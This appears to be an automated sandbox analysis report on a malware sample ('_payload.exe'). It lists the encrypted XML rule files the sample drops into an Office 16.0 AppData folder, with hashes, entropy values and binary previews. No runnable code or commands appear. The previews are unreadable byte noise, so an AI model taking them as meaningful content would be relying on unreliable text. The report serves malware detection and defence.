                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3232
                                                                                                      Entropy (8bit):7.943384862031559
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:htrxAb94U+urOgRjwcBIGGTtTyLDOeJ//F9zz0E5kMJMAO0ZSZv9ORqHFcnEe90H:htdVRTWjwGcI91/JkiTYwqH2EQhO
                                                                                                      MD5:10E9442EB1F1BEE5274C99D614CED014
                                                                                                      SHA1:9F9E2AF94AEDB4581661E9DE365CFA21186C6A3C
                                                                                                      SHA-256:CA91B9E71FDCAB7A1F7B8AFA22999509EC171527171619B064B60158A4FCA904
                                                                                                      SHA-512:FC0DFBD7E418C15A541B83D700B6162BDCAD82C854BF117818AB9F886239F5585466E24C74D692FCFFC663BBF72882385DABB4CA8452C45329CF2FC1709ECCC1
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlhV....xG.....g.E.n..~j...XA...{..V .4..(..........HH....v...2.7..V..Y..q..u.......x..-........'D;.j.q..J..V.s....nT....i...F..s7..iH.......e.@......<.}...Pj1.A7.G..\.........?..5...?B=a...#%.o..o#SX...5..bI...E`.o.>........_ 3.}c..xr.....p..../eV.c@.D/.F...3u}..P.E.c....|n..x@..B.vmu...p.d.X.`..{.=.4.<}h..{....f.*....0..D<Y..Ny..t....&.@.'.GF.........Lj=..#Zi.U.#.>....g..7RF.^D.PbEi.;*u,...H..s.. ....!.P..c.XT..Z}.UW.>...h......>r.D..H....#..?a[V.d{......9.e.TF...o3....SXO$..`....,j..n.#>g.....[H.a.1.....iX.UX$u..w_..u..Dk...pk....]...nc..d.6._.w.6.@<F.G.m;..-.H.....*.u....T|..%.~......].>..n...%5V../.}o.........r.........;`%..U..K.....}n...a.3..%... ;C.............6.:....`c......I........5s.K.....a..X..).=.vrZW.........%....W.0.-.x.O...o.|......[k......[..w....U.W..[...~.o.>..`..6.".K..5.f......I..q..;.....nA..&...........$.i*..j..AE.YY`.V...K..Aph\.....9..0sB.y.........#k/...+ZON|.y".,.....s...tyB........X...b.Zb..\.f...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11190v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1231
                                                                                                      Entropy (8bit):7.817324774029836
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:p2JVtl4HjlP9aeVoCX+oiCzud4kjk9CSidwEr/Nz+gFBkLIvOxsl267WyLv6bD:QJTl4D5Dv5Cqok9r7yNz5FBk0WxWL7zs
                                                                                                      MD5:CADF7555C335ACF2EBC7476260B056ED
                                                                                                      SHA1:734D2191B32002E08C66D446911AC47759D4DCE4
                                                                                                      SHA-256:DD16A55C63C306A27961F90E7A56FF4000B737F6F6BB2F737C244617060F3F5A
                                                                                                      SHA-512:0E2CD03A57976EBFFB4A02488DC2CF56B5E1DC94FE1DC988972170F3B8FD5B6AAAF0436172EB1D5AA9B61C4EDEA0E6A1F56C4040BB0DC2DAD1821EB0328E15EB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml>Awu...;J.H5.^..&e.V..j.=.#...?..R.!)..K.x]8.;......x.{..A.h...$..-.....N.W...$S,QB_...8.A.<A...A.cX...x..~G.jA&....T.t.B.\+.Se..K..?mVWc.4..v..n...%...Z.....G-k.L..G!...s<.juk.,.....)/...O..9..u......0.....2.980.A..L.s..p....U.r.....7....{...#.x+...).n...qi...@...y[r..V....HdOzh......,-.w.Ud. a..kp2.. 2Z}...*....hXP$.}.<.|..<....*oM...mAb.;tp.|.|.XB(..s...I.5+......G..V..?...$.e.1...S...O.ZX.>._.s..6..&.....4...u.w...p.#.{s..).....qX.... .L.u.v......(.~..{..z..rT...W.....U.-..eg....W]....l< .....3.v^..3r./...I..99.:&X.. -..P...'.1.....me!l.....+.0.FK.4...w. ..,.....{..2.3....x..7|......g.v..?Q.4$...#...$..L-.Y.q.. l=.V.;2....}..@..A.Vi...P....p....{.#n..R6q..#.M...4i.7..(.xa.2.J.G..z.p&Cm4=hc...G.{..............u[...U7..3$.$.S..e....{Ggj.Di.<.8y.d.....B!.8.5Z".I.k.0:..b.....Lq...Y.a.r]..4.6.....X..3B...-6C...h...I...8.....L\.=1c..s.$.R.......c..|.KQe.<....~.....[jX7^B.<p....Jp=.j.......jq9...x.u.A.2/....f..E.B....:.....[..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11195v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7567
                                                                                                      Entropy (8bit):7.976131643630554
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:cmeX8bATMoEVBhV2GWK4T1hMWXHpxJ3qFOEoWlNbNptrPmn57gYzB7wtKQj:J7bANELj2G9aBXJbhHWlNZPm/zRYx
                                                                                                      MD5:7E1782DEF7AB1D9C0B11C0D4F308F857
                                                                                                      SHA1:9C28D52125E3C89CB2B166CBF517835268463400
                                                                                                      SHA-256:72C990F436E21AC979EBE05883F645C83332F26D614FF9A0706DC1B846E7E549
                                                                                                      SHA-512:F054BB7F93574A6DB38C2524399000C914F4DED95603CF592ECF04DB85A1E51621FD69F7E36D04E7D9E53580D02DF3753851A3A9FE51CD0B475CFA9139FC6DDF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.2.iT?....a$.._BRX..%e.{.L..'7._.....P......!.c...Dp..X.vw... ..W..v).;.UO....w..}r.N..W6...,f.+U .....'...k...M{.KcM..A.G......Rb.l=..Y....._R]..F.Rk..W.Z...d..O.b\.'j..G.........%7....h...&..k+..d..n.........v..Kl.].69...T...[5...`..G].).....9.eo...8n.K....Pz"...R..3e'...d..d..K+.`A#x./.rT......h.K.?..Z6+?A}............F...C..v."....x.#..............~..M...:......W....j.W..?.t.D'.z......w...-L.a...x..zC.l....b...6..9.J...g...kb....d2q5uQ.]..7.GoL..dk.....8;.8.m.F.XB].e>+.......x..o.....J.~gO.s..M...M..;..W2.....`..B\:.(......v..>-..~&..;p+?.......@...P.>.......{.3H.gL.@...N.d{L...s.4.*.Pb.+kj../K.oZ..,B;......F....H//u.....{..W[........X......d5..XW.S"!S{;.;.5.E..0EX....<.M.*....... ...Y.F=....O.OU.<C.-*&g@.K.....Ya....V.....3.R..U...Rcu<.0..}...?.*.X..p...r....'*4..Lkd.a7<.A[..&...S..?.D.....@M.C,./>..n..l.)...`.....&.*.%=.....w.. N...4..K....`U;.k*.RC7.e..I...].?...:<I.&..0...s..R.o$..e~K-....qI>n;.,..@e...4...g..,._.9.Lx

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11208v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):816
                                                                                                      Entropy (8bit):7.761936944930148
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:rFatr7AKKKkUwu0GCg1WPKEgyZgMlv6bD:5alRjw6rWPKIlwD
                                                                                                      MD5:0471C277956AE2BACA5CC658BA36944A
                                                                                                      SHA1:F99FAAF50E655BA04B8723FB13F8BEC66FA9188C
                                                                                                      SHA-256:92FE3B5B5B5EADFE9E72514658210C360589FD73D4F246C01E605DDD57F8843B
                                                                                                      SHA-512:A99B733E60396D4D015059AA20A38FE2721C1EF1E6053FAE4B6D46F840F99B4E0A4FE8DC609708A8015E06C11A8522DBDB0BCF2C36BA3ED55994AE5D0EA16686
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlH..l{.)NA.v%.......f..1.,.L5es.4S..#@.........wQ...{...........5.k..}.I....8.._.....m7A.Wmc.].&..m;..9....G?.)-z.&[2....&.....!...,%RG...."..+hV.o........t...&.. ..&fb...T...f. .......V4.a......C.{.]1......Z.......}..v]>..........2...n/....1...,..^..*5g.]9c|..d..;x........S..,.uD.?.k)...'....KM.........Z.AW.-m...*.......+....M...F..%..#7U.....Vt.~.2W%..w.S......6....}....5.v...J.d.e.m1.........Gh.B^..eS......h....|..7....Ri.-......f...adnl7.Q.`KX.._NQ~..].@.....LI...+.f...,...........G..r.+.r1.l.D._..I....'.'r...I[....rxl...D....Lw.`..L......6._8....Qv@.2...G.....hI|3i.0M.W.gS.l`.$rq.~..d.^.o....Z\!.m..|../.9.].[....s.!s....../F5.....5!..Cu.4.........H<.f.....B'..dL.Fo.o...i.9....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11209v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2272
                                                                                                      Entropy (8bit):7.912659195479127
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:A2NFNG2hLX0phhWiLYlstdA1tlfxTktPhWtXXi0QBK4Gf1CQMI4c8wD:dG2hzOolGdA1tlfxTSnyMI4cF
                                                                                                      MD5:D7C447B8EED23AC02A1926824DEBEAC5
                                                                                                      SHA1:78F3748F7E30FFCA86AA8C90163B42940848638B
                                                                                                      SHA-256:FAF4161471E98CB1DB6B98418E6DA3F3BFD5164453E322F5586CCE275D2B7B19
                                                                                                      SHA-512:F6BC1BB577641B8FEF2F11EB0C7F301D2446EC92A43F29A3139F5F28C9D7589A4E4FAD459FCA2334884D5F96D85C9BE38668D9B49180344163F32EFA56C9D196
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml=.s.J+...c..Z..(.D...S..`....[.w.qBN|>.&[.."...c..r...}.)4.$....t.Hj.....U..M..k..........4V..t.....Xd^%2....Z.&..x.....Z..G....rd....:...n..!.s:.q$._5,...Q......].G|.<S..h._$ ]Q.U.7..Y_<U..4.^......D..;o.N...m..\..}].q..Wk...j.!9....2h@b..RF4l".'1..C...v.4<...........<FWbb-.3{.......K!..&P....W.Z~m|....C;.z..p....f3.4>8W.m8S...we....%.d.b.O.F...G..[.#..U`/....$F..f=.......OA+..x?.XcD..../aO..)._2*.=.).%..^.....'. #..5.N.9..ov..+.K.1.8...J.6.A....Vo...M........CW+u....AS..x......d......lK.-*..0...,.............0-...V'...a.X%q.n.n^..j.....$.oD.2.B'..jJ......P;..+S....[.4.I~..8..r.g.`......Q....,..^y...x.Whw3.u..j.|...L.`.........1G..h+..s....gQ|..pE,. .....8g.2MG...PIZ...dg..[........<.6Sp....c..~...........uwv/f...D..c.>;.2b...V,.;Sz...........0l}+j.]B.{.....^:.Ar.6=xt.p...;."..f....=.M.......H(..b...t.6|a.l....q?7<.?.k....|Ha..=8.....fZ...>........hS.%..a.....~K..Y...>U../...O.....F=...k..........%...-%.....A..q.ac5.n..>...VF

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11210v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1311
                                                                                                      Entropy (8bit):7.85578132455209
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:F5xTqIUdF+YDln1sHx9t89FakCq/D+sNqDGMmXZvHu5Eqv6bD:VToF+YxnU8PahqCsNqDNmXZvywD
                                                                                                      MD5:970C2725021B5027D41E35F91CB10961
                                                                                                      SHA1:03E58326E11013335C7C9F924E78345405A564DB
                                                                                                      SHA-256:C88186E1BA15DB6CCCEE440E1AAF411C271F96D38AAF8A0D64660288CB9F2C2F
                                                                                                      SHA-512:2B2F4B35A73DBDE0CE08E9C817DEDC29DFC796733BA1BC9435D6C0C96987A8877E3471922A77B0ADA0E8D62EC7DBAA44C97F681510E0A301C7B19F40ED80FAC2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml_*......rc.^.n.._......L'..a{..YI...7.Q....D.+.&...0.>.{.PP..`...K......"..G[r...x.&.<.I...w.Q8..s.h...\.-k.&..w...P$..t.t5.I....Q.H.....l..}......e.....f.m).@.....\=..:....n:.o...fx.bO..}.,....#..n[..9Kf....M(. cFR^...C..j.h.!j..T.........S.:.3f.r.V...vQ...;......h.."...YQYZ%'....z.[.V..5.f.xe{."......+"......D...{N...8...K.....9..9..U@..d.....l.]I....m......jD..../Z..t>4.~]/W.$V4p{.>..'...e.M_D......!...A.kB...K..H.I.<....Z&<....?..qYLM..?........6,..5#......[... ?IM.&....s.....`.yR.>.".r.)...*....;e\.7.~.....C..}!..j...............fC.z...'.i9.S......,.....v.gU....^....[.......T..FZ.P.)+...'....F.VE..z.h....b..."6.K.1....\..}J.z.....1..p.W.d..AKZ.k.....y.b..@......F..`. ....t.]..,h.e..=.sA...{....,.N.....e.....O' `.wj%cG.Kcu....\o..$"..`.V. ..%.|..I.S.&.x....jY.i.^.9.....O.:kL3...~0v.#..l...S3.:nc.eN]}..`......C..#q.4V.fD..j...q./...8M......+:.fU7oI"....)Y9.t$L....P..t,.A..w.V;.x.. 7...Ja../.e.?..."...........<b+.Fy..j..7.t..t..X..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11264v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3172
                                                                                                      Entropy (8bit):7.937881180781608
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:411gvGxEp+hcGzcJnRXNCSoQUkO1C952SbaJkAywA4:41gvqXo7ekO1fJGD4
                                                                                                      MD5:0933720C5A0495D2868C514476B64AFC
                                                                                                      SHA1:46B141EAD413A15CD541A616FAAEB5253DC5547F
                                                                                                      SHA-256:0B2DB8DAD058120B3DF8CCF4C968114FB80DC4CD73A290376C61141427AA64DF
                                                                                                      SHA-512:CC4347AEE84381DC103207C128F11FB0E8D4FBC68E1CC0888F6327B634FD171040CFBD3CA63B79CE62DB624EE0399844A6ACF4687D1769464C58EA80E13B92D9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlA W.>C..|5.F.2UFNh%......<..k&.......m(...{O....O%....K{..E@@W.2.8....V......Ep.vo.<.#...h.8[q.(...-.B.l>.;.S......P.T|.+Xf&...}...L_B*eB.L.Lb..A.....h...{..3.f.;/.gz....i......\t....%.....&.l"...:..W.Q.^g.P.Rk7t.0.....Wg.....W......]...QC.e...Q.RL2.....7...o...<*...]..V...1o...Am?dfb...|..46..vs....+.HY..Q&t.G...=....b..S.<....)?.~........r..<".........O.!m.%.p...Nq|.;.X.r..........)..b.s...F.{8..>.U..r..H...,..{...us.3...b.4?^.....[9>fs..E...d_T..j. ......v.d.......O....E.....l.5-.~*.....uV..pk'Z..Q.B..v..}..*...,.J....v.....uH...P.....B.lw...vW.....u.oRBq.F..-.C._......2.#..y...\..ot. .t.&Ki..r.x6:.SA...s"X.I...'..g..E....&.....;^7......QN.BB./........d...?..9!`...=....l<.2.....d.........F..W.,.E..>..;>.e.....3.s=.=2......-{.......X6.....KS;.b)O.Z..T.J5.uK&.e@...!z.....%)...!..h.Y.......6F.<.f.q..w.Z.....4.U._.8.........vO{..).!...o2D..a.....{.....1..?.{aLD..R..S....I".cQ...d....#.D.q....wE.z.:.._...3....Y.q8.j#....F.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11265v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2096
                                                                                                      Entropy (8bit):7.910345248027817
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:+K1ycFZ+9aGavqT+qBTSmtA9awDrHlJ14c4V0TvEEab6dfwD:Vrj+iulttATrFD4Gibo0
                                                                                                      MD5:70C46F24A71E3969F05CF93ED6C2531F
                                                                                                      SHA1:CD255D9D79FF3AB36F69936174E295D3DE10EC39
                                                                                                      SHA-256:EE28F3BFE3717B85A38319C56A1D79DF3A97D81326BDE5284B46F358791A3C7A
                                                                                                      SHA-512:CB42579413BF31A95DA6481A6CC9767F9318C0D6CF83FC718A434937A1D686752008A305FD89D00D7E1F65F7E853701ECC9CB8C18498CB399F3630002717D025
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.6*.;.!A..E..H...D>u6,.B.;..:y.."..9.=....?dn8.\q.....l..]...Uj.......f1..k.+...jec>..t......W..TW.c?B\g.Gw...-}.5g...e..U....L.&.s...a.Q.fI.,m....yA....M.a...Q]U.....f./..(.cl..T...g>.E..5..o..o..'...).......p!K.f#.B.vT.%D.9S..!..m=.M.....y}..'/..4..t..a5.\3....c==.P~..h.=f...........n....M+`bI..g.A.(f<.+..g.^&..b7...W..".x.....HPa...x.#wmu...\...j.....Vbm..u~....\.#...'.X...I........(>B.|..+..7L....-.#>..?I..i..>.hc.....O.q. Of......L...N:. g..........=.evN.'..{.....xVA.n.... CYvl.1...8.Uw..%m.O....(8}.iK.s!..Q.Wx.gcp.....}.a.8.......P.N. o....."..".a..........+.y..Sjakx....W.J.[i.^..F..&...!.%.z...k......D..fP.].+*:....D>S........n....>%,hY.@=...m/f.Q.1n....}# ...x..D...H..c..x....|4..>..L....D..[.;....E0.#..Q.9.rnU..Y......U7*....Q.`j"?.. ...3......-.J2H...i.!#.6...d....q.*<.NEe`.d.zXeb.(.EXMu....+..1.K....`ZT.5...n{...w.i..u........l.[...m<.9Q.nNG.(..>........b.;....#../k.0E$.81...x^..5.;x5..J.T.Q...J.....G......-.s......3.ZW.....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11285v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7525
                                                                                                      Entropy (8bit):7.976352183465392
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:Y2NRzC39fPgy8vTDfISphogLRVPsNmrU1PfRoeEwz4ZTNgx92xzxxn9Iu5hwDOvi:YeuoF3ogbsNgAPVEVHgx92xzhRwDG0D
                                                                                                      MD5:44D5A5CDDAA0D8B0824F362FE5465DEB
                                                                                                      SHA1:43E50B2C86BE5B3064B7D71A61C4ADBE9713B417
                                                                                                      SHA-256:F130A7D7D1168F2A688ED439BB56EB3B9DB20BBD73C90ADAF6864F5C35331B58
                                                                                                      SHA-512:28E8EF8A699A1886FC4935E23B1BF7DB02B4E84A5A15F5A6EC6E404F8B94CD4C678E655142FFCC03FBE163A38BFA88E86339390E3FFC16C90CBD79583B42D184
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...BD..Rw...a.zog..._b.*Bb......fiCt..+...N...#.9.....~..e...3.U..h....t(MC.p.W.s.dty.Hv..6..lGi.O..XM....j\`..S..n......L.Lg..&g.0~.........J..sa...y.)0.0....).]...rn../s#,h.VA.....5.I..g.\...F...!U'E..%..D./.O...c.7exI.B7,`(.....@7.M.....lM... ..o..q}.I.v..Mf2S_........N......(.*..-!%....W+..2Z-...6..\.....g.H.i).k..>-...{...i..J......I9].1.b........`.uL.3..`..{xB)vy...c.p.?....J.g.g6......=.}aFm....o.c.p....eAE.ma.C.s...Mu_...<-.U.P. ...}`...W...z...V.B.V...<....-7....9i._.:H.K....P.._;....=&..;ek%..zL...C.S.{..u.m.....D.);....71:.c.z..|.....F.&....j$...sb.).}P.......*......8X!..|R.>.....P..)Y....Aot......6............$=..5o.L..1..]5.O....G.>....K8N.;,....D-..M'.bFm.{m?.c.;}4........wq3......_..$!.W.)..Gx.s.l(d.Uq;.....*..m.g..p.....%.a.....uj;N.=.m..qy..[.V.6X...;|5...z@w..s..Ap.v}....ax......}.i]..uC.....(../...+hr.JZj....v|...PLY...w7.3.9...G.z.....n.{c.cT....~.s....Q..........d..l.`{..[./...%.....R..%.x........J.Y.:|M.t...b.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11289v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4197
                                                                                                      Entropy (8bit):7.956557076368438
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:9oyAKjWTuTlaJFwzUh2uXVb0kK1/K6Yte8k7iZ0G+Cqhs:9FxqwaJF5LXVQkKzT8rZwzs
                                                                                                      MD5:C85B7CFB3B453B169351CF0C6B6A5550
                                                                                                      SHA1:93A0EC84C0797B7BD7D9E05F8964C20F12039185
                                                                                                      SHA-256:96EA96F3D84D3F5D324117F51169082D37935AB98304BC155860C9695AF207D7
                                                                                                      SHA-512:A93CD661EBFCCAC76148308826969CF18C332689070C4E8021D43B61B025C425C0FBCE8BC10F31604BF40F304D3EC3246F7E1C63F3BC4CD3622C0B846543E5E6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmli.N.k...2.S.t...G.I...h.\&B(.F'.J...Is....w.(1....dg.]Y.^.O..Y....i.`....AH.M..#av............w.......r..D.l,D...%..v3%...#.>.85L5?? .&.mNQd.R.p..(...g...Rx$.V..)t..d%.*.S......:.+.......{...9......8!ah4.C.>..~~..z...,..&.^KC......w.D).;..\.".v.J.[..j...>...F.N.1b,r..P..Cb.C5..n...v..cK.1.3_~..((..D.......O.~...j..;.@*....v<w1.tR.U..la..Fx.....F*A.a6.....!f....u...K<(....i......v.6p.>...-.`.....O...eM0..c.{K..Xs...w..K....0..?#.Y,..?/c.`8d....O..o...z.. #.]....F...pK.]*..8.8..[....Y]M6..x....5.....]..d]>.o..q.Su..}.D.S...l.;.d "..V......Ks6..T.<...X...;f..qP4~...._.w..........B.Q^ .n.....;#BK8..U.C.w..C.....i......l..EE._l..[....K...U.n.~.3.Y.......{..C...;...v..`.>...1...*.sT`.d.NK....'....:..+..}.Jb.R..H.. ..s..hw.s...5).........D.:.# .L..Z........a%..h..i.Yq`..".2.:7...K2.....9...{sX6..{.gl..a. ...D..D.`...-..m-.."u.,Gkp.G.D!..."R=.E#........n.L.pv,....m..R..;s..9...\.9,.0..............{.....r..PLr.,$0/.O....21...K./.X.~...&...g

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11300v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4608
                                                                                                      Entropy (8bit):7.963340505893304
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:2xjsUWlWqUI+CMJ8PcIy5Ltn69N44e9HCoN4pC8s9:2zWYq9X48PcIy5Lg4N4C8s9
                                                                                                      MD5:7B19B6ACCC5C32553841F3C1AD7A27E0
                                                                                                      SHA1:48CB40722513762837935E21FB97EB1A9B479FA0
                                                                                                      SHA-256:587E6CCDDD439DC396E35EB05C3E5D397308FD6229CC6675A460EABE96B4CA54
                                                                                                      SHA-512:D09BF9F590BD508C807E4F87F32F0239CCC142B781A72010984B1C19D9F6F97A70E300D9C70AB101E6FCC9FF5FF01BA9817247461E2A24DA6A1B4A51BB2C6D5B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlJ....o@...E70........K..5eS..u?\]A&...#. .....W."ASjIIZIN5._.......s..R...?)...H.(?....$.fk.W.6..P.\....K..l.m........e.3D..0.w$..4Ez.l..2..I.J.n...3f.j.W...1Z.ak....@..r..Fb.Ey..b..`.`u..7C......H.gQ..U.g...........P.............f0.t.}...........C..?`....W.=..,.h..F.....2.Yv..v..FfSR.[.O.2...*[5|..........+...G..-1...3.J.....e.#X.....G.@VE.%._..U.p..1p.....8R...|....4.D.|..<.o.4Mc.f.,F[....=....K......Z.D...sXc.1.....m....d.;R...8..s....z.A.......aRSn....m..Z.|....bH...3.H-..W..>....d....?'...2..M...........M.JU!.\,6.wU.R|..Mil.h...u).HD.m........RxT.J....FT..b...hD.........^.5.t|..<QF....@&......k.{\.r.m.{p...B.{X.,.m......~=;..&t.}.X.<+!Q+..-uf..U..{..W.....rW.R.ar.r. .P...]v\<2..Y..<.0g.}N.....J+.......^....f .H..v*...LS.U..3.9.....X:....(Et.k..........md..P.q..s...;..*(?*.4...$m..]..k.j......"W#.8x....HU..F.....*....IH..k.~`do...JH.=eD}.........;..0..-.d4.. ..m. c...v?#..3U>.c.Q.M..#.:Juc.l...@z|*..T_....&w.......J.Na[p.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11302v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2884
                                                                                                      Entropy (8bit):7.926044817210223
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cQfHW9OCTcxXQpJ5KaBnOimZKAy8cV55wUH3vhuECs4wK5daeJ7ZZhEwD:+tTSXQT5ZBOiwKAy8ceI3v737KbLfhd
                                                                                                      MD5:CF3B80BF6D9DA8BCFBE699429DE4B223
                                                                                                      SHA1:21B7E001995380BF770956086BBC8121615ECF31
                                                                                                      SHA-256:3E601BE43E3B3FB51A1B27B902970D386CE6447DBAF0D6081A4ACF240DA314C0
                                                                                                      SHA-512:8E9BFACFE09C2E6BC5EE93562F4797E093D489ABD67D1F93F79D142E5CBFE53CFBCD6BF7C29B0DFDC691506A65441E7C3E0D550A9C71AE18FF2BAA2F8579C382
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..*..........4Fr.p2..X6...#...xt.0.D.Y.ss......2. ..k..+X>S='Q..i..V..\.V...8...b...`~.;nU.._.9. ........E..~......=5Jd.{.dt...@.......=%..mCM.KHM...o.Z...]K.L:.;..o!..M........*-C.y...$".....5m...).OO.W~)..2.#q*V4w...1..%..l...J^..%....Jq.?..B&H.Qf...bE.s.[*...\i5-.2.j'.0... c..b.?./@/.G*...1..-x....+>.1..C....._...~O..H....@pZ|9...' ..p.5._.w..6.FnB.9....;.@.A..m;...SUS..3#...2Z.......Y.j..B..&..\)....W...,9..%O7b..P.w...^.S.z......6..&(je~...Bh.=..s....g....Otx..s(. .3.....(H....i.h.E7.R.\.baOGC.^..(.5e...6...j...n.w.......o...O.....M......Hv..v.D^rh..gX.".A.:....;..`f.%......3*.z.#-....B.}.....s.sP....A.T........z..Y..}.<.:k.<a..!.............:..4Q...c...^0..f.n..t./.^..f..?./.8b.(.w.q)..'..v...VA4F.4...K.... ..v.J@.a>..O...%N...q.q...N.X..[....\..^.Z..E*.......E..AJ.g.........%..#./...I....um..W....:.S.....O....9....N...]F.Q...5..5.fz.V./....o.+-..$.n.3..r..D.t.q...s.J.,.@..;.l..?Kne.Y....K\.#..._p*..(....W..q.4..0.........

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11362v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5842
                                                                                                      Entropy (8bit):7.96786197305418
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:l78pbwOl8vebVPZps0LX/1k3bKCdcC5wcK8F+PidUejGQ/kq2y3W:l78NwhveRRps07/AmEwcx+Pvykq2y3W
                                                                                                      MD5:787748972F0318E9DF34A653D6C41E19
                                                                                                      SHA1:0D3DD198AE60EFB08DC8A4469529BF95EE333784
                                                                                                      SHA-256:3B59671BF7CD7757661BF7868247218B7724F6D2828497930A4DE97ED36AEB48
                                                                                                      SHA-512:49E3BCF06C5BBAA6C4EE5B0E293A840584FA8312CA5CE05FF4057FDA0AD48AAEFF3BF958261745078F41F516ACA8536C5CC4BD5DE3E795515C89498D4281FC9F
                                                                                                      Malicious:false
